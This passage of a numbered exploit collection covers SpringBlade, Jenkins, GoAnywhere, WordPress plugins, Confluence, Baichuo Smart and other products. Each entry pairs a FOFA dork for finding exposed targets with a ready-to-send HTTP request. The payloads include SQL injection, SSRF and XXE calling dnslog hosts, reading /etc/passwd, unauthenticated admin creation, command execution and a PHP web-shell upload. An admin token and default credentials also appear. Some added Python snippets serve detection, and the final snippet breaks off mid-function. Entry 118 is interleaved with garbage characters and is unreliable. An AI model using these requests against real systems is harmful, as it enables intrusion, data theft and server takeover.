105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
URL as published (truncated):
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
The injection is error-based: the md5 value is reflected inside the XPath error raised by updatexml().

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The injection point is the query-string parameter name, not a value: the list endpoint folds request parameter names into the WHERE clause. A Blade-Auth token that the target accepts is required.

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The web-upload endpoint fetches the url parameter server-side to load it as a CSV; the DNS hit on the dnslog host confirms the request was made from the D-Tale host.

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
The CLI over HTTP uses two requests that share a Session id: the upload side carries the command and its arguments, the download side returns the output. An argument of the form @/path makes the args4j parser expand the file's contents into arguments, which is the file read.

Upload side:
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 57

\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03

(The body is raw binary, shown here with \x escapes; the 57 bytes above are the actual body length.)

Download side:
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response excerpt: lines of /etc/passwd come back as arguments in the error message and in the help text's default value.
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

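The upload body above is opaque as printed, so here is its framing written out. This is an added example, not code from the original article or from the Jenkins project: it builds the body from a list of CLI arguments and, more usefully for defenders, parses a captured body back into arguments and flags any that start with '@', which is the CVE-2024-23897 pattern. The frame layout (4-byte big-endian length, 1-byte opcode, payload; strings in Java writeUTF form) and the opcode numbers are read off the PoC bytes; the opcode names are this example's own labels.

```python
import struct

# Opcodes of the plain CLI protocol spoken over POST /cli?remoting=false.
# Values are taken from the PoC bytes above (0 = argument, 2 = encoding,
# 1 = locale, 3 = start); the names are this example's own labels.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3


def _java_utf(text):
    """Java DataOutputStream.writeUTF(): 2-byte big-endian length + UTF-8 bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op, payload=b""):
    """One protocol frame: 4-byte big-endian payload length, 1-byte opcode, payload."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_upload_body(args, encoding="GBK", locale="en_US"):
    """Body of the 'Side: upload' request carrying the CLI arguments."""
    body = b"".join(frame(OP_ARG, _java_utf(a)) for a in args)
    body += frame(OP_ENCODING, _java_utf(encoding))
    body += frame(OP_LOCALE, _java_utf(locale))
    body += frame(OP_START)
    return body


def parse_upload_body(body):
    """Split a captured upload body into (opcode, payload) frames."""
    frames, pos = [], 0
    while pos + 5 <= len(body):
        (length,) = struct.unpack(">I", body[pos:pos + 4])
        op = body[pos + 4]
        payload = body[pos + 5:pos + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated frame at offset %d" % pos)
        frames.append((op, payload))
        pos += 5 + length
    return frames


def cli_arguments(body):
    """Decode the ARG frames back into the argument list the server will parse."""
    args = []
    for op, payload in parse_upload_body(body):
        if op == OP_ARG:
            (n,) = struct.unpack(">H", payload[:2])
            args.append(payload[2:2 + n].decode("utf-8"))
    return args


def file_read_arguments(body):
    """Arguments that args4j would expand as '@file': alert on any of these."""
    return [a for a in cli_arguments(body) if a.startswith("@")]


if __name__ == "__main__":
    body = build_upload_body(["help", "@/etc/passwd"])
    print(len(body), body)
    print(file_read_arguments(body))
```

For detection, feed the bodies of POST /cli?remoting=false requests with a Side: upload header into file_read_arguments; any '@' argument from an unauthenticated client is an exploitation attempt regardless of which command precedes it.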
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The request passes the access check as a path under /goanywhere/images/, but the servlet container discards the ';' path parameter and resolves '..' before routing, so it is served as /goanywhere/wizard/InitialAccountSetup.xhtml: the post-install account-setup wizard, which lets you create an administrator account.

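The '..;/' trick in entry 110 and the '/../' prefix in entry 101 are the same bug class: authorisation decided on the raw path while routing happens on the canonical one. The following added example (not code from the original article, GoAnywhere or Ivanti) shows the vulnerable check next to the hardened one, with an approximation of servlet-container canonicalisation (percent-decode, strip ';' path parameters per segment, resolve dot segments). The prefix table is constructed for the example; whether ';' is treated as a path parameter depends on the server (Tomcat and Jetty strip it, nginx and Apache httpd do not), which is exactly why a front-end check and a Java backend can disagree.

```python
import posixpath
from urllib.parse import unquote

# Constructed routing table for the example: one prefix served without a
# session, one that must never be reachable once the product is installed.
STATIC_PREFIX = "/goanywhere/images/"
PROTECTED_PREFIX = "/goanywhere/wizard/"


def container_normalize(request_path):
    """Approximate what a servlet container does to a request URI before
    routing: percent-decode, drop ';name=value' path parameters from every
    segment, then resolve '.' and '..'. This is where '..;/' becomes '..'."""
    path = unquote(request_path.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/".join(segments)) or "/"


def vulnerable_is_public(request_path):
    """Authorisation decided on the raw path: anything that *starts* with the
    static prefix is waved through, including '/images/..;/wizard/...'."""
    return request_path.startswith(STATIC_PREFIX)


def hardened_is_public(request_path):
    """Decide on the canonical path, and deny protected resources explicitly
    so a future static prefix cannot reopen them."""
    canonical = container_normalize(request_path)
    if canonical.startswith(PROTECTED_PREFIX):
        return False
    return canonical.startswith(STATIC_PREFIX)


def is_traversal_attempt(request_path):
    """Log-review helper: a '..' segment or a ';' path parameter survives
    percent-decoding. Legitimate clients send neither."""
    decoded = unquote(request_path.split("?", 1)[0])
    return any(seg == ".." or ";" in seg for seg in decoded.split("/"))


if __name__ == "__main__":
    poc = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
    print(vulnerable_is_public(poc), container_normalize(poc), hardened_is_public(poc))
```

The same container_normalize applied to the entry 101 path collapses /api/v1/totp/user-backup-code/../../license/keys-status/ to /api/v1/license/keys-status, which is the endpoint the unauthenticated check never saw.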
111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Time-based blind: a vulnerable site takes about 6 seconds to respond.

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

The type value is used as a column name; the backtick closes the identifier and the rest is appended to the query. Time-based: about 5 seconds of delay on a vulnerable site.

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The link parameter is fetched without restricting the scheme: file:// reads local files, http:// turns the same endpoint into an SSRF.

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Time-based blind via the user parameter of the order/items REST route; about 5 seconds of delay on a vulnerable site.

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce. It is embedded in the HTML of any front-end page rendered by the theme, so no account is needed.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command. The queryEditor string is evaluated as PHP by the render_element endpoint; the PoC captures the output and throws it so it is returned in the error response.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

{{rand8}}.php is a scanner-template placeholder for a random eight-character filename; the file part is published empty and the PHP content to upload goes in its body. The Content-Type of the part is declared as image/png while the extension is .php, which is the check the plugin fails to make.

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

The id parameter is accepted as an array and its where key is concatenated into the query; time-based blind, about 5 seconds of delay on a vulnerable site.

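Entries 105 through 117 share a small set of payload shapes (SLEEP() for time-based blind, updatexml() for error-based, and the comment or tautology tails), and they all leave the payload in the request line, where a web-server access log keeps it. The following added example (not code from the original article or any of the plugins) is a log scanner that percent-decodes each request target until stable, so double encoding does not hide the keywords, and reports which signature family matched. The log lines are constructed from the requests above; they are not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the requests in entries 105-117;
# not real traffic. The last line is a benign request for comparison.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2024:10:00:01 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 512
10.0.0.5 - - [01/Apr/2024:10:00:02 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 77
10.0.0.5 - - [01/Apr/2024:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" 200 0
10.0.0.5 - - [01/Apr/2024:10:00:15 +0000] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 12
10.0.0.9 - - [01/Apr/2024:10:00:20 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=12 HTTP/1.1" 200 4096
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signature families matching the payload shapes used in the entries above.
SQLI_PATTERNS = {
    "time-based": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
    "error-based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "boolean-tail": re.compile(r"(?:--|#)\s*[-+\w]*$|\band\s+\(?\d+\)?\s*=\s*\(?\d+", re.I),
}


def decode_target(target):
    """Percent-decode until the string stops changing (double encoding is
    common in the wild) and fold '+' to space as form decoding would."""
    current, previous = target, None
    for _ in range(3):
        if current == previous:
            break
        previous, current = current, unquote_plus(current)
    return current


def classify(target):
    """Names of the signature families present in one request target."""
    decoded = decode_target(target)
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]


def scan_log(text):
    """Return (client_ip, path, [families]) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        families = classify(m["target"])
        if families:
            hits.append((m["ip"], m["target"].split("?", 1)[0], families))
    return hits


if __name__ == "__main__":
    for ip, path, families in scan_log(SAMPLE_LOG):
        print(ip, path, ",".join(families))
```

Time-based payloads also leave a second trace that this scanner does not use: the request duration. Where the log format includes it, a response time close to the SLEEP() argument on a hit is confirmation that the injection actually executed rather than merely being attempted.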
" L3 N/ K' b. C: i118. 北京百绰智能S210管理平台uploadfile.php任意文件上传1 Y: W3 W# ~$ `: d
CVE-2024-0939# P- Q% s2 ?$ _
FOFA:title="Smart管理平台"9 B( {! k+ x, S/ P) E( N
POST /Tool/uploadfile.php? HTTP/1.1" z; C3 M* ^$ B1 I1 e" ?' M
Host: 192.168.40.130:8443
. i4 a9 q0 h2 {! W2 d- pCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
6 Q( y* Z [. n2 y! v. cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0) L$ d% ~5 i+ r2 ?& y# ?6 Y$ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# O6 `& I% \7 ?3 R) T& wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 f1 `$ } ]* {: [. T$ QAccept-Encoding: gzip, deflate
' W( y& k8 p1 g9 c8 {" i- _/ \9 kContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
" o1 a6 B# u2 ^; L% i* pContent-Length: 405
- I3 S D* c7 v: {+ SOrigin: https://192.168.40.130:84435 C# M( M* i8 h! R% d5 K; d( D+ V
Referer: https://192.168.40.130:8443/Tool/uploadfile.php+ s5 z/ x. |: y9 n6 C. t
Upgrade-Insecure-Requests: 1
/ a, w, X' q- S9 L8 ZSec-Fetch-Dest: document5 w; f* o% @) w8 x) x
Sec-Fetch-Mode: navigate
9 N4 M/ D5 @6 ?- H- W# Z, pSec-Fetch-Site: same-origin
1 E* r5 l# T% u3 l9 lSec-Fetch-User: ?1
' X/ @) l y, p3 ETe: trailers; l6 J3 D- I0 C. `
Connection: close4 p) c9 _2 Z! w# b, N1 d+ f+ ^
( X7 m2 P! }0 e9 S
-----------------------------13979701222747646634037182887
3 L# O' a% H2 W) z! MContent-Disposition: form-data; name="file_upload"; filename="contents.php" v( h% {4 U2 ?$ L
Content-Type: application/octet-stream
2 e( i0 q5 F2 U1 E# v! A+ h0 A# d M7 }: K* |
<?php6 z, R' I+ g' H9 ~
system($_POST["passwd"]);+ Y4 G' m' Z, U0 d1 y
?>
+ |' _3 G* K, i4 F2 s! q, _$ U-----------------------------13979701222747646634037182887
9 |' k9 s3 s; ^/ a+ pContent-Disposition: form-data; name="txt_path"5 s1 Q( p7 _7 C% @
- I L% }# D( v8 t) |0 s/home/src.php7 {; {; B- i% K# ?
-----------------------------13979701222747646634037182887--
4 \3 b: G O5 x' p6 N4 [" o1 p# E% F8 T' ~& `% Y3 J
# B2 Q1 a+ P3 |6 Y
访问/home/src.php2 q3 c( ~1 J* P. s* a
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin. Use the resulting PHPSESSID in the request.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

Time-based blind through the id field of the "add administrator" action: the request is delayed by 5 seconds when the database name is 3 characters long.

120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The file is written to /upload/2.php.

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

The file is written to boot/web/upload/weblogo/1.php (the web logo upload path).

122. Byzoro (北京百绰智能) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter carries the SQL statement base64-encoded (not encrypted): sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output comes back in the X-Cmd-Response response header, which is where to look when checking whether a target is affected.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then reachable at:
http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
ComfyUI is only one aiohttp-based application; any service that serves a static route on a vulnerable aiohttp version is in scope.
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A DNS lookup arriving at the dnslog host confirms that the Params XML is parsed with external entities enabled.
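The defensive counterpart to the request above, as an added example (not code from the page or from Glodon): a pre-parse gate for the Params field that walks the DTD with expat, lists every entity pointing outside the document, and refuses to hand such input to the real parser. The sample XML is constructed to match the PoC; attacker.example stands in for the dnslog host.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


def external_entities(xml_text):
    """Return [(entity_name, system_id)] for every entity the DTD declares
    with a SYSTEM or PUBLIC identifier. Nothing is fetched: the reference
    handler returns 1, which tells expat to skip the reference rather than
    resolve it, so this is safe to run on untrusted input."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found.append((name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        return 1  # continue parsing without opening system_id

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
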